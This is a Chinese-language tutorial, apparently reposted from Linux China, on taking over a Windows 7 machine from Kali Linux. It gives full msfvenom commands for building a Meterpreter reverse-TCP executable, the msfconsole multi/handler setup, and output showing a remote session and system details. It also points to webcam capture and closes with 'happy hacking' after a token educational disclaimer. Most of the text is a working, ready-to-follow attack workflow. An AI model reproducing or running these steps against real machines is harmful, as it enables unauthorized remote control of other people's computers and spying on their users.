閱讀662 返回首頁    go 阿裏雲 go 技術社區[雲棲]


如何使用 Kali Linux 黑掉 Windows

Kali Linux 派生自 Debian Linux,主要用於滲透測試,擁有超過 300 個的預安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一個用於開發和執行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意,我寫這篇文章隻是出於教育目的哦——一切因此帶來的後果和本文作者、譯者無關。

源機器詳情

Kali Linux


  1. root@kali:/# uname -a
  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
  3. root@kali:/#

用做攻擊對象的目標機器:


  1. Windows 7 Ultimate SP1

步驟 1:創建 Payload 程序

Payload 是一個類似於病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那台機器。可以通過以下命令來創建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。


  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. No Arch selected, selecting Arch: x86 from the payload
  4. No encoder or badchars specified, outputting raw payload
  5. Payload size: 333 bytes
  6. Final size of exe file: 73802 bytes
  7. Saved as: /root/program.exe
  8. root@kali:/# ls -la /root/program.exe
  9. -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通過 ls 命令,我們可以確認 Payload 程序是否成功生成在指定的位置。

步驟 2:運行 mfsconsole 命令啟動 msf 命令窗口


  1. root@kali:# msfconsole
  2. .,,. .
  3. .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
  4. d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
  5. d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
  6. d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
  7. 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
  8. d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
  9. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
  10. .a#$$$$$$"` 88b d8P 88b`?8888P'
  11. ,s$$$$$$$"` 888888P' 88n _.,,,ass;:
  12. .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
  13. .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
  14. ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
  15. .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
  16. _______________________________________________________________ ,&$$$$$$'_____
  17. ll&&$$$$'
  18. .;;lll&&&&'
  19. ...;;lllll&'
  20. ......;;;llll;;;....
  21. ` ......;;;;... . .
  22. Taking notes in notepad? Have Metasploit Pro track & report
  23. your progress and findings -- learn more on https://rapid7.com/metasploit
  24. =[ metasploit v4.12.22-dev ]
  25. + -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
  26. + -- --=[ 455 payloads - 39 encoders - 8 nops ]
  27. + -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]
  28. msf >

步驟 3:進行漏洞利用的細節

  • 4444 端口:你可以按照自己的想法來選擇使用哪個端口
  • LHOST IP:表示 Kali Linux 機器的 IP,這裏是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。

  1. root@kali:/# ip r l
  2. 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
  3. root@kali:/#

現在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:


  1. msf > use exploit/multi/handler
  2. msf exploit(handler) >

然後在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp


  1. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp

現在使用 LHOST 和 LPORT 來設置本地 IP 和本地端口,如下:


  1. msf exploit(handler) > set lhost 192.168.189.128
  2. lhost => 192.168.189.128
  3. msf exploit(handler) > set lport 4444
  4. lport => 4444

最後使用 exploit 命令。


  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler...

現在你需要在 Windows 上運行 program.exe,一旦它在目標機器上執行,你就可以建立一個 meterpreter 會話。輸入 sysinfo 就可以得到這台被黑掉的 Windows 機器的詳情。


  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler...
  4. [*] Sending stage (957999 bytes) to 192.168.189.1
  5. [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
  6. meterpreter > sysinfo
  7. Computer : MANN-PC
  8. OS : Windows 7 (Build 7601, Service Pack 1).
  9. Architecture : x64 (Current Process is WOW64)
  10. System Language : en_IN
  11. Domain : WORKGROUP
  12. Logged On Users : 2
  13. Meterpreter : x86/win32

一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help 命令獲取更多信息,以便列出你可以黑掉該係統的所有選項,比如 webcam_snap 命令獲取網絡攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!! ←_←


原文發布時間為:2017-02-11

本文來自雲棲社區合作夥伴“Linux中國”

最後更新:2017-05-26 09:02:08

  上一篇:go  為什麼新年下的決心總是實現不了
  下一篇:go  編寫 android 測試單元該做的和不該做的事